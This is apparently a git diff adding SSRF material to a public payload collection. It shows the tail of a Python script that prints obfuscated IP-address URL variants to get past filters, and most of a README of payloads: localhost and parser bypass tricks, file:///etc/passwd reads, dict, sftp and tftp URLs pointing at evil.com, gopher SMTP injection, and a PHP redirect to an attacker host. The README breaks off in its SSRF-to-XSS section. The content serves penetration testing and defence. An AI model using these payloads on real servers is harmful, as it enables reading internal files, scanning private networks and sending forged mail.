print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP11,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP11,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP11,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP11,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP11,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP11,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP11,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP11,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP11,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP11,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP11,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP11,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP11,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP11,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP11,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP11,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP11,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP11,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP11,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP11,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 12 - Dotted octal with padding + Dotted hexadecimal + Dotless decimal
|
||||||
|
print(bluecolor,"Dotted octal with padding + Dotted hexadecimal + Dotless decimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP12 = '0' + OCT_SINGLE(ipFrag3) + "." + HEX_SINGLE(ipFrag2,"yes") + "." + str(DECIMAL_SINGLE(ipFrag1,1) + DECIMAL_SINGLE(ipFrag0,0))
|
||||||
|
print('http://',IP12,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP12,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP12,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP12,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP12,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP12,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP12,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP12,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP12,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP12,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP12,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP12,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP12,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP12,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP12,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP12,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP12,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP12,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP12,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP12,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 13 - Abusing IDNA Standard
|
||||||
|
print(bluecolor,"Abusing IDNA Standard: ",resetcolor,yellowcolor,"http://ß.localdomain.pw/", resetcolor,' -> ',yellowcolor,'http://cc.localdomain.pw/',resetcolor,' => ',bluecolor,'DNS',resetcolor,' => ',yellowcolor,'127.127.127.127',resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print('http://ß.localdomain.pw/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://ß.localdomain.pw/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 14 - Abusing 。and 。
|
||||||
|
IPAddressParts = arg1.split(".")
|
||||||
|
print(bluecolor,"Abusing 。and 。: ",resetcolor,yellowcolor,"http://",IPAddressParts[0],"。",IPAddressParts[1],"。",IPAddressParts[2],"。",IPAddressParts[3],"/",resetcolor," and " ,yellowcolor,"http://",IPAddressParts[0],"。",IPAddressParts[1],"。",IPAddressParts[2],"。",IPAddressParts[3],"/", resetcolor,' -> ',yellowcolor,"http://",IPAddressParts[0],".",IPAddressParts[1],".",IPAddressParts[2],".",IPAddressParts[3],"/",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print('http://',IPAddressParts[0],'。',IPAddressParts[1],'。',IPAddressParts[2],'。',IPAddressParts[3],'/',sep='')
|
||||||
|
print('http://',IPAddressParts[0],'。',IPAddressParts[1],'。',IPAddressParts[2],'。',IPAddressParts[3],'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IPAddressParts[0],'。',IPAddressParts[1],'。',IPAddressParts[2],'。',IPAddressParts[3],'/',file=f,sep='')
|
||||||
|
print('http://',IPAddressParts[0],'。',IPAddressParts[1],'。',IPAddressParts[2],'。',IPAddressParts[3],'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 15 Abusing Enclosed Alphanumerics
|
||||||
|
print(bluecolor,"Abusing Enclosed Alphanumerics:",resetcolor," ",yellowcolor,'http://',convertIP2EnclosedAlphanumericsValue(), resetcolor,' -> ',yellowcolor,"http://",arg1,resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print('http://',convertIP2EnclosedAlphanumericsValue(),'/',sep='')
|
||||||
|
print('http://',convert_ip(IP1),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP2),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP3),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP4),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP5),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP6),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP7),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP8),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP9),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP10),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP11),':',PORT,'/',sep='')
|
||||||
|
print('http://',convert_ip(IP12),':',PORT,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',convertIP2EnclosedAlphanumericsValue(),'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP1),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP2),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP3),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP4),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP5),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP6),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP7),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP8),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP9),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP10),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP11),':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',convert_ip(IP12),':',PORT,'/',file=f,sep='')
|
||||||
|
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
f.close()
|
||||||
|
print("\n",bluecolor,'-----------------------------------------------------------------------------------------------------------------------------------------',resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("Results are exported to: " + FILENAME,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print(bluecolor,'-----------------------------------------------------------------------------------------------------------------------------------------',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
BIN
Server-Side Request Forgery/Images/Parser & Curl < 7.54.png
Normal file
BIN
Server-Side Request Forgery/Images/Parser & Curl < 7.54.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 179 KiB |
BIN
Server-Side Request Forgery/Images/SSRF_Parser.png
Normal file
BIN
Server-Side Request Forgery/Images/SSRF_Parser.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 381 KiB |
BIN
Server-Side Request Forgery/Images/SSRF_stream.png
Normal file
BIN
Server-Side Request Forgery/Images/SSRF_stream.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 67 KiB |
BIN
Server-Side Request Forgery/Images/WeakParser.jpg
Normal file
BIN
Server-Side Request Forgery/Images/WeakParser.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 106 KiB |
512
Server-Side Request Forgery/README.md
Normal file
512
Server-Side Request Forgery/README.md
Normal file
@ -0,0 +1,512 @@
|
|||||||
|
# Server-Side Request Forgery
|
||||||
|
|
||||||
|
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Tools](#tools)
|
||||||
|
* [Payloads with localhost](#exploit-with-localhost)
|
||||||
|
* [Bypassing filters](#bypassing-filters)
|
||||||
|
* [SSRF exploitation via URL Scheme](#ssrf-via-url-scheme)
|
||||||
|
* [SSRF to XSS](#ssrf-to-xss-by-d0rkerdevil--alyssaoherrera)
|
||||||
|
* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
|
||||||
|
* [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
|
||||||
|
* [SSRF URL for Google Cloud](#ssrf-url-for-google-cloud)
|
||||||
|
* [SSRF URL for Digital Ocean](#ssrf-url-for-digital-ocean)
|
||||||
|
* [SSRF URL for Packetcloud](#ssrf-url-for-packetcloud)
|
||||||
|
* [SSRF URL for Azure](#ssrf-url-for-azure)
|
||||||
|
* [SSRF URL for OpenStack/RackSpace](#ssrf-url-for-openstackrackspace)
|
||||||
|
* [SSRF URL for HP Helion](#ssrf-url-for-hp-helion)
|
||||||
|
* [SSRF URL for Oracle Cloud](#ssrf-url-for-oracle-cloud)
|
||||||
|
* [SSRF URL for Kubernetes ETCD](#ssrf-url-for-kubernetes-etcd)
|
||||||
|
* [SSRF URL for Alibaba](#ssrf-url-for-alibaba)
|
||||||
|
* [SSRF URL for Docker](#ssrf-url-for-docker)
|
||||||
|
* [SSRF URL for Rancher](#ssrf-url-for-rancher)
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
- [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap)
|
||||||
|
- [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus)
|
||||||
|
|
||||||
|
## Payloads with localhost
|
||||||
|
|
||||||
|
Basic SSRF v1
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://127.0.0.1:80
|
||||||
|
http://127.0.0.1:443
|
||||||
|
http://127.0.0.1:22
|
||||||
|
http://0.0.0.0:80
|
||||||
|
http://0.0.0.0:443
|
||||||
|
http://0.0.0.0:22
|
||||||
|
```
|
||||||
|
|
||||||
|
Basic SSRF - Alternative version
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://localhost:80
|
||||||
|
http://localhost:443
|
||||||
|
http://localhost:22
|
||||||
|
```
|
||||||
|
|
||||||
|
Advanced exploit using a redirection
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
1. Create a subdomain pointing to 192.168.0.1 with DNS A record e.g:ssrf.example.com
|
||||||
|
2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP
|
||||||
|
vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
|
||||||
|
```
|
||||||
|
|
||||||
|
Advanced exploit using type=url
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
Change "type=file" to "type=url"
|
||||||
|
Paste URL in text field and hit enter
|
||||||
|
Using this vulnerability users can upload images from any image URL = trigger an SSRF
|
||||||
|
```
|
||||||
|
|
||||||
|
## Bypassing filters
|
||||||
|
|
||||||
|
Bypass using HTTPS
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
https://127.0.0.1/
|
||||||
|
https://localhost/
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass localhost with [::]
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://[::]:80/
|
||||||
|
http://[::]:25/ SMTP
|
||||||
|
http://[::]:22/ SSH
|
||||||
|
http://[::]:3128/ Squid
|
||||||
|
```
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://0000::1:80/
|
||||||
|
http://0000::1:25/ SMTP
|
||||||
|
http://0000::1:22/ SSH
|
||||||
|
http://0000::1:3128/ Squid
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass localhost with a domain redirecting to locahost
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://localtest.me
|
||||||
|
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
|
||||||
|
http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
|
||||||
|
```
|
||||||
|
|
||||||
|
The service nip.io is awesome for that, it will convert any ip address as a dns.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass localhost with CIDR : 127.x.x.x
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
it's a /8
|
||||||
|
http://127.127.127.127
|
||||||
|
http://127.0.1.3
|
||||||
|
http://127.0.0.0
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass using a decimal ip location
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://0177.0.0.1/
|
||||||
|
http://2130706433/ = http://127.0.0.1
|
||||||
|
http://3232235521/ = http://192.168.0.1
|
||||||
|
http://3232235777/ = http://192.168.1.1
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass using malformed urls
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
localhost:+11211aaa
|
||||||
|
localhost:00011211aaaa
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass using rare address
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://0/
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass using bash variables (curl only)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
curl -v "http://evil$google.com"
|
||||||
|
$google = ""
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass using tricks combination
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
|
||||||
|
urllib2 : 1.1.1.1
|
||||||
|
requests + browsers : 2.2.2.2
|
||||||
|
urllib : 3.3.3.3
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass using enclosed alphanumerics [@EdOverflow](https://twitter.com/EdOverflow)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
|
||||||
|
|
||||||
|
List:
|
||||||
|
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass filter_var() php function
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
0://evil.com:80;http://google.com:80/
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass against a weak parser - by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://127.1.1.1:80\@127.2.2.2:80/
|
||||||
|
http://127.1.1.1:80\@@127.2.2.2:80/
|
||||||
|
http://127.1.1.1:80:\@@127.2.2.2:80/
|
||||||
|
http://127.1.1.1:80#\@127.2.2.2:80/
|
||||||
|
```
|
||||||
|
|
||||||
|
![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/WeakParser.jpg)
|
||||||
|
|
||||||
|
|
||||||
|
## SSRF exploitation via URL Scheme
|
||||||
|
|
||||||
|
File : allows an attacker to fetch the content of a file on the server
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
file://path/to/file
|
||||||
|
file:///etc/passwd
|
||||||
|
file://\/\/etc/passwd
|
||||||
|
ssrf.php?url=file:///etc/passwd
|
||||||
|
```
|
||||||
|
|
||||||
|
Http: allows an attacker to fetch any content from the web, it can also be used to scan ports.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
ssrf.php?url=http://127.0.0.1:22
|
||||||
|
ssrf.php?url=http://127.0.0.1:80
|
||||||
|
ssrf.php?url=http://127.0.0.1:443
|
||||||
|
```
|
||||||
|
|
||||||
|
![SSRF stream](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_stream.png)
|
||||||
|
|
||||||
|
The following URL scheme can be used to probe the network
|
||||||
|
|
||||||
|
Dict : the DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
|
||||||
|
ssrf.php?url=dict://attacker:11111/
|
||||||
|
```
|
||||||
|
|
||||||
|
Sftp : a network protocol used for secure file transfer over secure shell
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
ssrf.php?url=sftp://evil.com:11111/
|
||||||
|
```
|
||||||
|
|
||||||
|
Tftp : Trivial File Transfer Protocol, works over UDP
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
|
||||||
|
```
|
||||||
|
|
||||||
|
Ldap : Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
|
||||||
|
```
|
||||||
|
|
||||||
|
Gopher
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
|
||||||
|
|
||||||
|
will make a request like
|
||||||
|
HELO localhost
|
||||||
|
MAIL FROM:<hacker@site.com>
|
||||||
|
RCPT TO:<victim@site.com>
|
||||||
|
DATA
|
||||||
|
From: [Hacker] <hacker@site.com>
|
||||||
|
To: <victime@site.com>
|
||||||
|
Date: Tue, 15 Sep 2017 17:20:26 -0400
|
||||||
|
Subject: Ah Ah AH
|
||||||
|
|
||||||
|
You didn't say the magic word !
|
||||||
|
|
||||||
|
|
||||||
|
.
|
||||||
|
QUIT
|
||||||
|
```
|
||||||
|
|
||||||
|
Gopher SMTP - Back connect to 1337
|
||||||
|
|
||||||
|
```php
|
||||||
|
Content of evil.com/redirect.php:
|
||||||
|
<?php
|
||||||
|
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
|
||||||
|
?>
|
||||||
|
|
||||||
|
Now query it.
|
||||||
|
https://example.com/?q=http://evil.com/redirect.php.
|
||||||
|
```
|
||||||
|
|
||||||
|
Gopher SMTP - send a mail
|
||||||
|
|
||||||
|
```php
|
||||||
|
Content of evil.com/redirect.php:
|
||||||
|
<?php
|
||||||
|
$commands = array(
|
||||||
|
'HELO victim.com',
|
||||||
|
'MAIL FROM: <admin@victim.com>',
|
||||||
|
'RCPT To: <sxcurity@oou.us>',
|
||||||
|
'DATA',
|
||||||
|
'Subject: @sxcurity!',
|
||||||
|
'Corben was here, woot woot!',
|
||||||
|
'.'
|
||||||
|
);
|
||||||
|
|
||||||
|
$payload = implode('%0A', $commands);
|
||||||
|
|
||||||
|
header('Location: gopher://0:25/_'.$payload);
|
||||||
|
?>
|
||||||
|
```
|
||||||
|
|
||||||
|
## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
|
||||||
|
|
||||||
|
```bash
|
||||||
|
http://brutelogic.com.br/poc.svg -> simple alert
|
||||||
|
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple ssrf
|
||||||
|
|
||||||
|
